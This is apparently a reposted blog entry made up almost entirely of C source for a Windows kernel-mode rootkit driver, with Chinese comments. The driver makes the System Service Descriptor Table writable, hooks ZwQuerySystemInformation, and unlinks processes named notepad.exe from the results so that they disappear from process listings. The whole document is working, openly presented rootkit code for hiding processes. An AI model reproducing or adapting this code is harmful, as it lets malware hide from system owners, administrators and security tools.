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#include "ntddk.h" #define BOOL int #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; //仅适用于checked build版本 unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; //获得SSDT基址宏 #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)] //获得函数在SSDT中的索引宏 #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1) //调换自己的hook函数与原系统函数的地址 #define HOOK_SYSCALL(_Function, _Hook, _Orig ) \ _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook) //卸载hook函数 #define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \ InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook) PMDL g_pmdlSystemCall; PVOID *MappedSystemCallTable; //以下为隐藏进程用的结构 struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; //windows 2000 only struct _SYSTEM_THREADS Threads[1]; }; // Added by Creative of rootkit.com struct _SYSTEM_PROCESSOR_TIMES { LARGE_INTEGER IdleTime; LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER DpcTime; LARGE_INTEGER InterruptTime; ULONG InterruptCount; }; NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)( ULONG SystemInformationCLass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation; LARGE_INTEGER m_UserTime; LARGE_INTEGER m_KernelTime; //我们的hook函数,过滤掉notepad.exe的进程 NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength) { NTSTATUS ntStatus; ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) ( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); if( NT_SUCCESS(ntStatus)) { // Asking for a file and directory listing if(SystemInformationClass == 5) { // 列举系统进程链表 struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; while(curr) { if (curr->ProcessName.Buffer != NULL) { if(0 == memcmp(curr->ProcessName.Buffer, L"notepad.exe", 22)) { //m_UserTime.QuadPart += curr->UserTime.QuadPart; //m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) // Middle or Last entry { if(curr->NextEntryDelta) prev->NextEntryDelta += curr->NextEntryDelta; else // we are last, so make prev the end prev->NextEntryDelta = 0; } else { if(curr->NextEntryDelta) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryDelta; } else // 唯一的进程 SystemInformation = NULL; } } } else // Idle process入口 { // 把_root_进程的时间加给Idle进程,Idle称空闲时间 // curr->UserTime.QuadPart += m_UserTime.QuadPart; // curr->KernelTime.QuadPart += m_KernelTime.QuadPart; // 重设时间,为下一次过滤 // m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; } prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } } return ntStatus; } VOID OnUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("ROOTKIT: OnUnload called\n"); // 卸载hook UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation ); // 解索并释放MDL if(g_pmdlSystemCall) { MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall); IoFreeMdl(g_pmdlSystemCall); } } NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath) { DbgPrint("ROOTKIT: Start\n"); theDriverObject->DriverUnload = OnUnload; // 初始化全局时间为零 // 这将会解决时间问题,如果不这样,尽管隐藏了进程,但时间的消耗会不变,cpu 100% m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)); g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4); // 储存旧的函数地址 if(!g_pmdlSystemCall) { return STATUS_UNSUCCESSFUL; } MmBuildMdlForNonPagedPool(g_pmdlSystemCall); // 改变MDL的Flags属性为可写,既然可写当然可读,可执行 g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); // 用了宏,把原来的Zw*替换成我们的New*函数。至此已完成了我们的主要两步,先突破了SSDT的保护,接着用宏更改了目标函数,下来就剩下具体的过滤任务了 HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation ); return STATUS_SUCCESS; } |
转载请注明:exchen's blog » Ring0 下实现进程隐藏